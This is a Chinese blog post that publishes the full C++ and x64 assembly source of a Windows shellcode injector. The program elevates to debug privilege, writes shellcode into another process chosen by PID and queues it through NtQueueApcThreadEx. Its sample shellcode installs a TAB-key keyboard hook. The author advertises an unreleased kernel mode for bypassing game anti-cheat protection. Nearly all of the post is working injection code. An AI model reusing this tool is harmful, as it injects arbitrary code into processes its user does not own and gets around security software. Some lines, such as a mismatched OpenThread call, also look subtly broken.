ShellCode注入程序

逆向协议风控大师2023-12-16 10:16

程序功能是利用NtQueueApcThreadEx注入ShellCode到一个进程中,程序运行后会让你选择模式,按1为普通模式,所需的常规API接口都是使用Windows原本正常的API;在有游戏保护的进程中Windows原本正常的API无法使用,这时候需要选择内核模式,按2选择内核模式。

内核模式下使用的一些关键API都是我自己在ring0从0实现的,本帖仅开源普通模式下的代码。内核模式下使用的关键API以及调用框架不开源。

选择模式之后需要输入被注入进程的PID

项目包含三个源代码文件:1.源.cpp

2.fun.asm

3.fun.h

首先是源.cpp文件代码:

|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 | 插入代码 ````````````/*` `*` `函数原型:` `NTSTATUS NtQueueTHreadApcEx(` `_in HANDLE thread,` `_in UCHAR flags,0:常规用户APC,1:特殊用户APC` `_in PAPCFUNC apcRoutine,` `_in PVOID context1,` `_in PVOID arg1,` `_in PVOID arg2` `);` `需要从Ntdll.dll模块显式导出(GetProcAddress)` `*/` `#define _CRT_SECURE_NO_WARNINGS` `#include<stdio.h>` `#include<Windows.h>` `#include<Tlhelp32.h>` `#include"fun.h"` `HWND hwndG =` `0;` `BOOL` `CALLBACK EnumWindowsProc(` ` HWND hwnd,` ` LPARAM lParam)` `{` ` WCHAR path[MAX_PATH] =` `{ 0` `};` ` WCHAR*` `text =` `(WCHAR*)lParam;` ` GetWindowText(hwnd, path, MAX_PATH);` ` if` `(lstrcmpW(text, path) ==` `0)` ` {` ` hwndG =` `hwnd;` ` return` `FALSE;` ` }` ` else` ` {` ` hwndG =` `0;` ` return` `TRUE;` ` }` `}` `DWORD WINAPI GetThreadIdByProcessId(DWORD dwProcessId)` `{` ` THREADENTRY32 th32;` ` th32.dwSize =` `sizeof(THREADENTRY32);` ` DWORD dwThreadId =` `0;` ` HANDLE hdTool =` `CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, dwProcessId);` ` if` `(Thread32First(hdTool, &th32))` ` {` ` do` ` {` ` if` `(th32.th32OwnerProcessID ==` `dwProcessId)` ` {` ` dwThreadId =` `th32.th32ThreadID;` ` //printf("%d\n", dwThreadId);` ` break;` ` }` ` } while` `(Thread32Next(hdTool, &th32));` ` }` ` else` ` {` ` DWORD dwErro =` `GetLastError();` ` //printf("遍历进程失败!------%d", dwErro);` ` return` `dwErro;` ` }` ` ` ` return` `dwThreadId;` `}` `BOOL` `WINAPI PrivilegeAdjust()` `{` ` BOOL` `flag;` ` HANDLE token;` ` if` `(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token))` ` {` ` //printf("打开令牌失败!\n");` ` flag =` `FALSE;` ` }` ` LUID pid;` ` if` `(!LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &pid))` ` {` ` //printf("查看特权ID失败\n");` ` flag =` `FALSE;` ` }` ` TOKEN_PRIVILEGES tp;` ` tp.PrivilegeCount =` `1;` ` tp.Privileges[0].Luid =` `pid;` ` tp.Privileges[0].Attributes =` `SE_PRIVILEGE_ENABLED;` ` if` `(!AdjustTokenPrivileges(token, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))` ` {` ` //printf("提升特权失败!\n");` ` flag =` `FALSE;` ` }` ` return` `TRUE;` `}` `typedef BOOL(*MYTYPE)(HANDLE, LPVOID, LPVOID, SIZE_T, SIZE_T*);` `typedef HANDLE(*OPPS)(DWORD, BOOL, DWORD);` `typedef BOOL(*WRMEMEX)(HANDLE, LPVOID, LPVOID, SIZE_T, SIZE_T*);` `typedef HANDLE(*OPTS)();` `typedef ULONG64(*GETPEB)(DWORD);` `typedef NTSTATUS(*NTQUEAPC)(HANDLE, UCHAR, PVOID, PVOID, PVOID, PVOID);` `WRMEMEX Read;` `WRMEMEX Write;` `OPPS OpenPro;` `OPTS OpenThr;` `NTQUEAPC NtQueueUserApcEx;` `VOID InitFrmak()` `{` ` printf("内核\n");` ` NtQueueUserApcEx =` `NULL;` ` HMODULE mod =` `LoadLibraryA("ApiSystemCall.dll");` ` Read =` `(WRMEMEX)GetProcAddress(mod, "YhReadProcessMemory");` ` Write =` `(WRMEMEX)GetProcAddress(mod, "YhWriteProcessMemory");` ` OpenPro =` `(OPPS)GetProcAddress(mod, "YhOpenProcess");` ` OpenThr =` `(OPTS)GetProcAddress(mod, "YhOpenThread");` ` NtQueueUserApcEx =` `(NTQUEAPC)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueueApcThreadEx");` ` if` `(NtQueueUserApcEx ==` `NULL)` ` {` ` MessageBoxA(NULL, "获取函数失败", 0, 0);` ` }` `}` `VOID InitFrmakEx()` `{` ` NtQueueUserApcEx =` `NULL;` ` ` ` printf("普通\n");` ` Read =` `ReadProcessMemory;` ` Write =` `WriteProcessMemory;` ` OpenPro =` `OpenProcess;` ` OpenThr =` `OpenThread;` ` NtQueueUserApcEx =` `(NTQUEAPC)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueueApcThreadEx");` ` if` `(NtQueueUserApcEx ==` `NULL)` ` {` ` MessageBoxA(NULL, "获取函数失败", 0, 0);` ` }` `}` `typedef VOID(*FUN)();` `int` `main()` `{` ` DWORD pid;` ` SIZE_T size=0;` ` CONTEXT text;` ` VirtualProtect(fun, 0x60, PAGE_EXECUTE_READWRITE, &pid);` ` (ULONG64)(&(((UCHAR*)fun2)[0x34])) =` `MessageBoxA;` ` *(ULONG64*)(&(((UCHAR*)fun2)[0x9f])) =` `SetWindowsHookExA;` ` //fun(NULL,NULL,NULL);` ` printf("请输入模式:\n1.普通模式\n2.内核模式\n");` ` scanf("%d", &size);` ` (size==1)? InitFrmakEx(): InitFrmak();` ` printf("请输入进程PID:\n");` ` scanf("%d", &pid);` ` PrivilegeAdjust();` ` ` ` HANDLE hd =` `OpenPro(PROCESS_ALL_ACCESS, FALSE, pid);` ` PVOID mem =` `VirtualAllocEx(hd, NULL, 0X1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);` ` DWORD tid =` `GetThreadIdByProcessId(pid);` ` HANDLE td;` ` if` `(size ==` `1)` ` {` ` td =` `OpenThr(THREAD_ALL_ACCESS,FALSE,tid);` ` }` ` else` ` {` ` td =` `OpenThr(tid, hd, THREAD_ALL_ACCESS, FALSE);` ` }` ` if` `(!Write(hd, mem, fun2, 0x100, &size))` ` {` ` MessageBoxA(0, "写入失败", 0, 0);` ` }` ` SuspendThread(td);` ` NTSTATUS code =` `NtQueueUserApcEx(td, 1, (PVOID)(((ULONG64)mem)+0x53), tid, 0, 0);` ` if(code!=0)` ` {` ` ` ` printf("%x\n", code);` ` MessageBox(0, 0, 0, 0);` ` }` ` ResumeThread(td);` ` system("pause");` ` return` `0``;` `}` |

fun.asm文件

|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 | .code MessageBoxA proto fun2 proc ``push rbp; ``mov rbp,rsp; ``sub rsp,``060h``; ``xor rax,rax; ``cmp rcx,rax; ``jnz sub_1; ``cmp rdx,``09h``;;虚拟键代码``0x9``为键盘的TAB键 ``jnz sub_1; ``xor rcx,rcx; ``lea rdx,qword ptr[lab_2]; ``xor r8,r8; ``xor r9,r9; ``mov rax,qword ptr[lab_1]; ``call rax; sub_1: ``mov rsp,rbp; ``pop rbp; ``ret; fun2 endp lab_1: ``db ``00h``; ``db ``00h``; ``db ``00h``; ``db ``00h``; ``db ``00h``; ``db ``00h``; ``db ``00h``; ``db ``00h``; lab_2: ``db ``0c2h``; ``db ``0edh``; ``db ``0bbh``; ``db ``0afh``; ``db ``0cch``; ``db ``0dah``; ``db ``0cah``; ``db ``0c7h``; ``db ``0c9h``; ``db ``0b5h``; ``db ``0b1h``; ``db ``0c6h``; ``db ``0a3h``; ``db ``0a1h``; ``db ``00ah``; ``db ``00h``; ``db ``00h``; ``db ``00h``; ``db ``00h``; ``db ``00h``; ``db ``00h``; ``db ``00h``; ``db ``00h``; fun proc ``push rbp; ``mov rbp,rsp; ``sub rsp,``080h``; ``mov r9,rcx; ``mov rcx,``02h``; ``lea rdx,qword ptr [fun2]; ``xor r8,r8; ``mov rax,qword ptr [sub_2]; ``call rax; ``cmp rax,``0``; ``jnz lab_3; ``xor rcx,rcx; ``xor rdx,rdx; ``xor r8,r8; ``mov r9,``02h``; ``mov rax,qword ptr [lab_1]; ``call rax; lab_3: ``mov rsp,rbp; ``pop rbp; ``ret; sub_2: ``db ``00h``; ``db ``00h``; ``db ``00h``; ``db ``00h``; ``db ``00h``; ``db ``00h``; ``db ``00h``; ``db ``00h``; fun endp end |

fun.h文件

|-------|-----------------------------------------------------------------------------|
| 1 2 3 | #pragma once #include<Windows.h> void fun(PVOID a, PVOID b, PVOID c); |

shellCode的功能是给被注入进程设置一个键盘钩子,TAB键。

相关推荐
scan13 小时前
单片机串口接收状态机STM32
stm32·单片机·串口·51·串口接收
Qingniu014 小时前
【青牛科技】应用方案 | RTC实时时钟芯片D8563和D1302
科技·单片机·嵌入式硬件·实时音视频·安防·工控·储能
Mortal_hhh5 小时前
VScode的C/C++点击转到定义,不是跳转定义而是跳转声明怎么办?(内附详细做法)
ide·vscode·stm32·编辑器
深圳市青牛科技实业有限公司5 小时前
【青牛科技】应用方案|D2587A高压大电流DC-DC
人工智能·科技·单片机·嵌入式硬件·机器人·安防监控
Mr.谢尔比6 小时前
电赛入门之软件stm32keil+cubemx
stm32·单片机·嵌入式硬件·mcu·信息与通信·信号处理
LightningJie6 小时前
STM32中ARR(自动重装寄存器)为什么要减1
stm32·单片机·嵌入式硬件
鹿屿二向箔6 小时前
STM32外设之SPI的介绍
stm32
西瓜籽@7 小时前
STM32——毕设基于单片机的多功能节能窗控制系统
stm32·单片机·课程设计
远翔调光芯片^138287988729 小时前
远翔升压恒流芯片FP7209X与FP7209M什么区别?做以下应用市场摄影补光灯、便携灯、智能家居(调光)市场、太阳能、车灯、洗墙灯、舞台灯必看!
科技·单片机·智能家居·能源
极客小张10 小时前
基于STM32的智能充电桩:集成RTOS、MQTT与SQLite的先进管理系统设计思路
stm32·单片机·嵌入式硬件·mqtt·sqlite·毕业设计·智能充电桩
热门推荐
01如何才能让手机厂商主动拥抱华为,接入鸿蒙系统?02【HarmonyOS】HUAWEI DevEco Studio 下载地址汇总03组基轨迹建模 GBTM的介绍与实现(Stata 或 R)04基于YOLOv10深度学习的CT扫描图像肾结石智能检测系统【python源码+Pyqt5界面+数据集+训练代码】深度学习实战、目标检测05(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明06【经验分享】Ubuntu22.04安装微信(linux官方版)07【TC3xx芯片】TC3xx芯片电源管理系统PMS详解08全面解析:构建基于深度学习的安全帽检测系统(UI界面+YOLO代码+数据集)09RAG 实践- Ollama+RagFlow 部署本地知识库10你还在傻傻的打开页面输用户名和密码?来我教你实现自动化